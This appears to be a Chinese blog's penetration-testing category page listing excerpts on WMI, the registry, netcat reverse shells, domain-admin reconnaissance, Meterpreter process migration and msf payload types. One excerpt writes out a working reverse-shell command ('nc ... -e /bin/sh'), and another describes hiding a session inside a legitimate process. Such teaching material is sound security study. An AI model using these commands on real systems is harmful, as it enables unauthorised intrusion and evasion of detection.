随笔分类 -  渗透测试

摘要:Windows管理设施 Windows管理设施(WMI Windows Management Instrumentation)是windows 03/xp开始,Windows内置的一个系统工具,用来方便管理员远程管理Windows主机。Windows程序和脚本可以使用WMI COM API与WMI交 阅读全文
posted @ 2021-03-05 14:28 g0udan 阅读(674) 评论(0) 推荐(0)
摘要:概念 注册表是一个系统定义的数据库,应用程序和系统组件在其中存储和检索配置数据。在注册表中存储的数据根据Microsoft Windows版本不同而不同。应用程序使用注册表API来检索、修改或删除注册表数据。 5个根键 根键 说明 HKEY_CURRENT_USER 包含当前登录的用户的配置信息的根 阅读全文
posted @ 2021-03-02 16:00 g0udan 阅读(831) 评论(0) 推荐(0)
摘要:反弹shell常用命令及分析 1.利用nc反弹shell 一般情况下 服务端:nc 192.168.247.1 8888 -e /bin/sh vps:nc lvp 8888 nc参数说明 -e program to exec after connect,程序重定向 -l listen mode,使 阅读全文
posted @ 2020-11-18 12:05 g0udan 阅读(3143) 评论(0) 推荐(0)
摘要:参考书籍《内网安全攻防》.徐焱 贾晓璐 著 如有侵权,请联系,立删 查找域管理进程 在获取了管理员权限的系统中寻找域管理员登录进程,进而收集域管理员的凭据 本机检查 1.获取域管理员列表 net group "Domain Admins" /domain 2.列出本机的所有进程及进程用户 taskl 阅读全文
posted @ 2020-09-27 14:21 g0udan 阅读(332) 评论(0) 推荐(0)
摘要:参考书籍《内网安全攻防》.徐焱 贾晓璐 著 如有侵权,请联系,立删 收集域内基础信息 需要域用户或system权限 1.查询域 net view /domain 需要关闭防火墙执行 2.查询域内所有计算机 net view /domain:GOD //GOD为查询到的域 根据实际修改 3.查询域内所 阅读全文
posted @ 2020-09-27 14:20 g0udan 阅读(545) 评论(0) 推荐(0)
摘要:参考书籍《内网安全攻防》.徐焱 贾晓璐 著 如有侵权,请联系,立删 ##收集本机信息 ###手动信息收集 ipconfig /all 获取网络配置信息 systeminfo 查询操作系统和版本信息、补丁信息等主机信息 echo %PROCESSOR_ARCHITECTURE% 查看系统体系结构 wm 阅读全文
posted @ 2020-09-27 14:17 g0udan 阅读(833) 评论(0) 推荐(0)
摘要:目的 通过msf得到的会话容易被发现,导致后渗透失败。因此我们可以把shell的进程迁移绑定到目标机正常的进程中 操作 手动迁移 自动迁移 手动迁移: 首先反弹一个shell,在meterpreter中执行ps命令查看目标机器的进程。x64_8080.exe是我用msf生成的payload,在目标机 阅读全文
posted @ 2020-03-04 20:26 g0udan 阅读(5365) 评论(0) 推荐(0)
摘要:两种方式 msf生成的payload分为正向和反向两种,正向需要正向连接,反向需要反向连接,反向是最常用的方式 正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接 如果把攻击机器比喻成你,目标机器比喻成妹子,正向连接相当于你去追追妹子, 阅读全文
posted @ 2020-02-22 20:51 g0udan 阅读(3055) 评论(0) 推荐(0)